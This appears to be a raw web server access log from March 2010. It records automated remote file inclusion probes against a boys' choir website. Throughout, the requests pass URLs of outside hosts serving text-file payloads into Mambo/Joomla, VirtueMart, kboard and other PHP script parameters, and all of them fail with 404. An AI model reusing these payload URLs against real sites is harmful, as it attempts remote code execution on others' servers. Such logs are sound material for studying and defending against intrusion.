211.47.237.17 - - [09/Mar/2010:08:52:48 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:08:53:02 -0800] "GET /logs/access_100129.log%20%20//delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:25 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:25 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:25 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:35 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:35 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:35 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:39 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:39 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:53:40 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:08:53:46 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:08:53:49 -0800] "GET /logs/access_100214.log/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:55:10 -0800] "GET /logs/access_091229.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:55:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:55:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:55:33 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:55:33 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:55:33 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
95.110.224.127 - - [09/Mar/2010:08:56:19 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:08:56:55 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:08:56:55 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:08:56:55 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:08:57:11 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:57:27 -0800] "GET /logs/access_091029.log///bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:58:02 -0800] "GET /logs/access_100202.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:58:04 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:58:08 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:58:18 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:58:31 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
95.110.224.127 - - [09/Mar/2010:08:58:34 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:58:34 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:58:48 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:59:09 -0800] "GET /logs/access_100112.log%20%20/include/lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/kill-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:59:09 -0800] "GET /include/lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/kill-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:59:09 -0800] "GET /logs/include/lib.inc.php?site_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/kill-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:08:59:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:08:59:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:59:19 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:08:59:20 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:08:59:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:59:28 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:08:59:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:08:59:39 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:08:59:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:08:59:40 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:08:59:40 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:08:59:40 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:08:59:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:08:59:43 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:59:46 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:08:59:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:08:59:46 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:08:59:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:08:59:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:08:59:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:08:59:48 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:08:59:49 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:09:00:00 -0800] "GET /logs/access_100209.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:00:04 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:00:05 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:09:00:06 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:00:07 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:00:07 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:00:08 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:00:13 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:00:14 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:00:15 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:00:23 -0800] "GET /logs/access_100209.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:00:35 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:01:11 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:01:11 -0800] "GET /logs/access_100101.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:01:55 -0800] "GET /logs/access_091229.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:02:10 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:02:10 -0800] "GET /logs/access_100101.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:02:10 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:02:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:02:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:02:14 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:02:26 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:02:41 -0800] "GET /logs/access_091229.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:02:49 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:03:04 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:09:03:23 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:09:03:23 -0800] "GET /logs/access_100209.log%20%20///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:09:03:24 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:03:30 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:03:31 -0800] "GET /logs/access_100101.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:03:31 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.44 - - [09/Mar/2010:09:03:52 -0800] "GET /logs/access_100129.log/lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.243.44 - - [09/Mar/2010:09:03:52 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.243.44 - - [09/Mar/2010:09:03:53 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:09:03:53 -0800] "GET /logs/access_100210.log%20%20///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:09:04:01 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:09:04:01 -0800] "GET /logs/access_100209.log///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:09:04:02 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:09:04:24 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:04:27 -0800] "GET /logs/access_091229.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:09:04:44 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:05:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:05:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
